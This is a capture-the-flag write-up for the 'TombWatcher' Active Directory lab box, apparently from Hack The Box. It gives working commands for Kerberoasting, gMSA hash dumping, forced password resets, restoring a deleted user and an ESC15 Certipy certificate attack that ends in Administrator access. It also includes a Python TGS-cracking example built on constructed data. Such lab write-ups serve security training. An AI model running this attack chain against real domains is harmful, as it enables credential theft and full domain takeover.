TombWatcher
Machine Information: As is common in real-life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!

Scan:
# Nmap 7.95 scan initiated Sat Jun 7 19:03:46 2025 as: /usr/lib/nmap/nmap --privileged -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49683,49684,49685,49704,49710,49725,49732 -oN targeted 10.10.11.72
Nmap scan report for 10.10.11.72
Host is up (0.24s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-07 23:03:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-07T23:05:25+00:00; +3h59m55s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-07T23:05:25+00:00; +3h59m56s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-06-07T23:05:24+00:00; +3h59m56s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-06-07T23:05:25+00:00; +3h59m56s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49683/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49684/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49725/tcp open msrpc Microsoft Windows RPC
49732/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3h59m55s, deviation: 0s, median: 3h59m55s
| smb2-time:
| date: 2025-06-07T23:04:43
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 7 19:05:30 2025 -- 1 IP address (1 host up) scanned in 104.46 seconds
Note the clock skew nmap reports (about +4h against the DC): Kerberos rejects requests whose timestamp is more than 5 minutes off, so sync your clock with the DC (ntpdate or faketime) before any Kerberos-based step below. Then collect BloodHound data with the henry credentials:
python3 bloodhound.py -c ALL -u henry -p 'H3nry_987TGV!' -d tombwatcher.htb -ns 10.10.11.72 --zip

WriteSPN
Kerberoasting attack
henry holds WriteSPN over Alfred. targetedKerberoast.py abuses it by writing a temporary SPN on the target account, requesting a TGS for it and removing the SPN again; the resulting Kerberos TGS hash of Alfred can then be cracked offline to recover his password.
python3 targetedKerberoast.py -v -d 'tombwatcher.htb' -u 'henry' -p 'H3nry_987TGV!'

Cracking the Kerberos hash
With John the Ripper, Alfred's TGS hash (saved in hashes.txt) is cracked to obtain his plaintext password.
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
bas----- (?)
AddSelf
Checking Alfred's group membership
Alfred has AddSelf over the INFRASTRUCTURE group, i.e. he can add himself to it. The command below only lists the group's current members, so run it after adding Alfred to confirm that the membership change took effect and that he now holds that group's privileges in the domain.
net rpc group members "INFRASTRUCTURE" -U tombwatcher.htb/Alfred%'basketball' -S 10.10.11.72
ReadGMSAPassword
Dumping the gMSA password hash with gMSADumper
The INFRASTRUCTURE membership grants ReadGMSAPassword over the group managed service account ansible_dev$. gMSADumper reads its msDS-ManagedPassword attribute and derives the NT hash of ansible_dev$ (this is not an AS-REP hash; it is the account's current managed password, which is random binary data and only usable as a hash), so the next step is pass-the-hash rather than a login with a plaintext password.
python3 gMSADumper.py -u 'Alfred' -p 'basketball' -d 'tombwatcher.htb'
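Both the Kerberoast crack above and the gMSA dump rest on the same primitive: the NT hash, MD4 over a UTF-16LE password. The following added Python example (not part of this writeup, and not code from targetedKerberoast.py, John or gMSADumper) shows that mechanics offline. It builds a constructed $krb5tgs$23$ line, cracks it against a tiny wordlist by decrypting the RC4-HMAC enc-part the way John does, and parses a constructed MSDS-MANAGEDPASSWORD_BLOB into the NT hash that gMSADumper prints. The SPN http/fake.tombwatcher.htb, the ticket bytes and the blob contents are made up for the example.

```python
# Added example, not code from the writeup, targetedKerberoast, John or gMSADumper:
# the NT-hash mechanics behind the Kerberoast crack and the gMSA dump. Sample data is constructed.
import hashlib
import hmac
import struct
from typing import Optional

MASK = 0xFFFFFFFF
TGS_REP_TICKET_USAGE = 2  # RFC 4120 key-usage number for a ticket's enc-part


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 only ships MD4 in its legacy provider."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    # pad: 0x80, zeros to 56 mod 64, then the original bit length (little-endian)
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = ((f, range(16), (3, 7, 11, 19), 0),
              (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
              (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1))
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, order, shifts, const in rounds:
            for i, k in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers: next step updates the old d
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE password): the RC4-HMAC Kerberos key and the pass-the-hash credential."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, usage: int):
    """RFC 4757 RC4-HMAC (etype 23): returns (checksum, ciphertext), the two hex fields of a $krb5tgs$23$ line."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    checksum = _hmac_md5(k1, plaintext)
    return checksum, rc4(_hmac_md5(k1, checksum), plaintext)


def try_password(candidate: str, checksum: bytes, ciphertext: bytes, usage: int = TGS_REP_TICKET_USAGE) -> bool:
    """One cracking step: derive K1 from the candidate's NT hash, decrypt, recompute the HMAC."""
    k1 = _hmac_md5(nt_hash(candidate), struct.pack("<I", usage))
    plaintext = rc4(_hmac_md5(k1, checksum), ciphertext)
    return hmac.compare_digest(_hmac_md5(k1, plaintext), checksum)


def parse_krb5tgs23(line: str):
    """Split a '$krb5tgs$23$*user$REALM$spn*$checksum$edata2' line (John/hashcat format)."""
    if not line.startswith("$krb5tgs$23$"):
        raise ValueError("only etype 23 (RC4-HMAC) handled; AES etypes 17/18 use another format")
    ident, checksum, edata2 = line[len("$krb5tgs$23$"):].rsplit("$", 2)
    return ident.strip("*"), bytes.fromhex(checksum), bytes.fromhex(edata2)


def crack_krb5tgs23(line: str, wordlist) -> Optional[str]:
    _, checksum, edata2 = parse_krb5tgs23(line)
    return next((w for w in wordlist if try_password(w, checksum, edata2)), None)


def build_sample_hash(password: str, spn: str = "http/fake.tombwatcher.htb") -> str:
    """Constructed hash line: 8-byte confounder plus stand-in bytes instead of a real EncTicketPart."""
    plaintext = b"\x11" * 8 + b"CONSTRUCTED-ENC-TICKET-PART"
    checksum, ct = rc4_hmac_encrypt(nt_hash(password), plaintext, TGS_REP_TICKET_USAGE)
    return f"$krb5tgs$23$*alfred$TOMBWATCHER.HTB${spn}*${checksum.hex()}${ct.hex()}"


def parse_managed_password_blob(blob: bytes) -> bytes:
    """MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.19): return CurrentPassword as raw UTF-16LE bytes.
    Real gMSA passwords are 256 random bytes, so md4() of these bytes is the usable credential."""
    version, _res, length, cur, prev, query, _unch = struct.unpack_from("<HHIHHHH", blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a v1 managed-password blob")
    pw = blob[cur:prev if prev else query]
    return pw[:-2] if pw.endswith(b"\x00\x00") else pw  # drop the UTF-16 terminator


def build_sample_blob(password: str) -> bytes:
    """Constructed v1 blob: no previous password, zeroed interval fields."""
    pw = password.encode("utf-16-le") + b"\x00\x00"
    query = 16 + len(pw)
    body = pw + struct.pack("<QQ", 0, 0)
    return struct.pack("<HHIHHHH", 1, 0, 16 + len(body), 16, 0, query, query + 8) + body


if __name__ == "__main__":
    print(crack_krb5tgs23(build_sample_hash("basketball"), ["password", "123456", "basketball"]))
    print(md4(parse_managed_password_blob(build_sample_blob("password"))).hex())
```

Two practical points the code makes explicit. A $krb5tgs$23$ hash is cheap to crack only because etype 23 derives its key directly from the NT hash; an account limited to AES (etypes 17/18) forces a PBKDF2-based key derivation that is orders of magnitude slower per guess. And a gMSA's 256-byte random password is nothing you will ever type, so the NT hash is the credential itself, which is why the next step authenticates as ansible_dev$ with -p ':<hash>'.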

ForceChangePassword
Changing SAM's password
ansible_dev$ holds ForceChangePassword over sam. With bloodyAD, authenticating as ansible_dev$ via pass-the-hash (the NT hash from the previous step, passed as -p ':<hash>'), sam's password is reset.
python3 bloodyAD.py -u 'ansible_dev$' -p ':1c37d00093dc2a5f251-----' -d tombwatcher.htb --dc-ip 10.10.11.72 set password sam 'Password123!'
[+] Password changed successfully!
WriteOwner
Changing JOHN's password
sam holds WriteOwner over JOHN. Owning an object does not by itself allow a password reset: first take ownership of JOHN (bloodyAD's set owner) and grant sam full control over him (add genericAll), and only then does the password reset below succeed. The command authenticates with sam's new password.
python3 bloodyAD.py --host 10.10.11.72 -d tombwatcher.htb -u 'SAM' -p 'Password123!' set password JOHN PasswordJohn2022
[+] Password changed successfully!
Connecting with Evil-WinRM
evil-winrm -i 10.10.11.72 -u john -p 'PasswordJohn2022'

PRIVILEGE ESCALATION
Restore-ADObject and Certipy
Enumerate deleted users in Active Directory (from the Evil-WinRM session as john; the query lists tombstoned user objects with their GUID, SID and former parent container):
Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects -Properties objectSid, lastKnownParent, ObjectGUID | Select-Object Name, ObjectGUID, objectSid, lastKnownParent | Format-List

Restore the deleted user object
The listing shows a deleted user, cert_admin. To bring it back, pass its ObjectGUID from the listing to Restore-ADObject. This only yields a usable account if the AD Recycle Bin feature is enabled on the forest (otherwise the tombstone has lost most of its attributes) and the caller has rights over the deleted object, which john has here:
Restore-ADObject -Identity '938182c3-bf0b-410a-9aaa-45c8e1a02ebf'
Changing the restored user's password (cert_admin)
python3 bloodyAD.py --host dc01.tombwatcher.htb -d tombwatcher.htb -u JOHN -p 'PasswordJohn2022' set password cert_admin 'PasswordJohn2022'
Requesting a certificate with Certipy
With cert_admin's password set, we request a certificate with Certipy. The goal is a certificate that authenticates as Administrator, issued from the WebServer template. This is Certipy's ESC15 path (CVE-2024-49019): WebServer lets the enrollee supply the subject, so the UPN Administrator can be injected, but the template has no Client Authentication EKU; on an unpatched CA the -application-policies 'Client Authentication' value gets embedded in the certificate and makes it acceptable for logon anyway. The password below is the one just set for cert_admin.
certipy req -u 'cert_admin@tombwatcher.htb' -p 'PasswordJohn2022' -target dc01.tombwatcher.htb -ca 'tombwatcher-CA-1' -template 'WebServer' -upn 'Administrator' -application-policies 'Client Authentication'
Authenticating with the certificate
With the certificate in hand, we authenticate to the tombwatcher.htb DC with it. The -ldap-shell option authenticates over LDAPS with the certificate (Schannel) and drops into an interactive LDAP shell, which is the route to take if PKINIT with the certificate is refused.
certipy auth -pfx administrator.pfx -dc-ip 10.10.XX.XX -domain tombwatcher.htb -ldap-shell
Changing the Administrator password
From the LDAP shell, which runs with Administrator's rights, we reset the Administrator password:
# change_password administrator Password@123
Got User DN: CN=Administrator,CN=Users,DC=tombwatcher,DC=htb
Attempting to set new password of: Password@123
Password changed successfully!
Access with Evil-WinRM, using the password just set in the LDAP shell:
evil-winrm -i dc01.tombwatcher.htb -u Administrator -p 'Password@123'
